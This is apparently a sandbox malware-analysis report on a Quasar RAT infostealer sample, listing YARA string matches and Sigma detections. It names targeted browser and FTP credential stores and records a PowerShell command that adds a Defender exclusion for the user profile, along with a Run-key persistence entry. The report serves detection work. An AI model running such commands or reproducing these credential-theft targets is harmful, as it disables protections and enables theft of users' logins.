0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
18.2.svchost.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
18.2.svchost.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
18.2.svchost.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
18.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
18.2.svchost.exe.400000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
29.2.wmplayer.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
29.2.wmplayer.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
29.2.wmplayer.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
29.2.wmplayer.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
29.2.wmplayer.exe.400000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d09d:$x1: Quasar.Common.Messages 0x29d3c6:$x1: Quasar.Common.Messages 0x2a9a4a:$x4: Uninstalling... good bye :-( 0x2ab23f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8ffc:$f1: FileZilla\recentservers.xml 0x2a903c:$f2: FileZilla\sitemanager.xml 0x2a907e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a92ca:$b1: Chrome\User Data\ 0x2a9320:$b1: Chrome\User Data\ 0x2a95f8:$b2: Mozilla\Firefox\Profiles 0x2a96f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb650:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a984c:$b4: Opera Software\Opera Stable\Login Data 0x2a9906:$b5: YandexBrowser\User Data\ 0x2a9974:$b5: YandexBrowser\User Data\ 0x2a9648:$s4: logins.json 0x2a937e:$a1: username_value 0x2a939c:$a2: password_value 0x2a9688:$a3: encryptedUsername 0x2fb594:$a3: encryptedUsername 0x2a96ac:$a4: encryptedPassword 0x2fb5b2:$a4: encryptedPassword 0x2fb530:$a5: httpRealm
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9b34:$s3: Process already elevated. 0x28cd9c:$s4: get_PotentiallyVulnerablePasswords 0x276e58:$s5: GetKeyloggerLogsDirectory 0x29cb25:$s5: GetKeyloggerLogsDirectory 0x28cdbf:$s6: set_PotentiallyVulnerablePasswords 0x2fcc7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d09d:$x1: Quasar.Common.Messages 0x29d3c6:$x1: Quasar.Common.Messages 0x2a9a4a:$x4: Uninstalling... good bye :-( 0x2ab23f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8ffc:$f1: FileZilla\recentservers.xml 0x2a903c:$f2: FileZilla\sitemanager.xml 0x2a907e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a92ca:$b1: Chrome\User Data\ 0x2a9320:$b1: Chrome\User Data\ 0x2a95f8:$b2: Mozilla\Firefox\Profiles 0x2a96f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb650:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a984c:$b4: Opera Software\Opera Stable\Login Data 0x2a9906:$b5: YandexBrowser\User Data\ 0x2a9974:$b5: YandexBrowser\User Data\ 0x2a9648:$s4: logins.json 0x2a937e:$a1: username_value 0x2a939c:$a2: password_value 0x2a9688:$a3: encryptedUsername 0x2fb594:$a3: encryptedUsername 0x2a96ac:$a4: encryptedPassword 0x2fb5b2:$a4: encryptedPassword 0x2fb530:$a5: httpRealm
19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9b34:$s3: Process already elevated. 0x28cd9c:$s4: get_PotentiallyVulnerablePasswords 0x276e58:$s5: GetKeyloggerLogsDirectory 0x29cb25:$s5: GetKeyloggerLogsDirectory 0x28cdbf:$s6: set_PotentiallyVulnerablePasswords 0x2fcc7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
5.2.ngen.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
5.2.ngen.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.ngen.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
5.2.ngen.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
5.2.ngen.exe.400000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab934:$s3: Process already elevated. 0x28eb9c:$s4: get_PotentiallyVulnerablePasswords 0x278c58:$s5: GetKeyloggerLogsDirectory 0x29e925:$s5: GetKeyloggerLogsDirectory 0x28ebbf:$s6: set_PotentiallyVulnerablePasswords 0x2fea7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
Click to see the 64 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KxgGGaiW3E.exe", ParentImage: C:\Users\user\Desktop\KxgGGaiW3E.exe, ParentProcessId: 6612, ParentProcessName: KxgGGaiW3E.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 3816, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\KxgGGaiW3E.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KxgGGaiW3E.exe, ProcessId: 6612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KxgGGaiW3E

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\KxgGGaiW3E.exe" , ParentImage: C:\Users\user\KxgGGaiW3E.exe, ParentProcessId: 7424, ParentProcessName: KxgGGaiW3E.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7516, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KxgGGaiW3E.exe", ParentImage: C:\Users\user\Desktop\KxgGGaiW3E.exe, ParentProcessId: 6612, ParentProcessName: KxgGGaiW3E.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 3816, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5800, ProcessName: svchost.exe

Snort Signatures

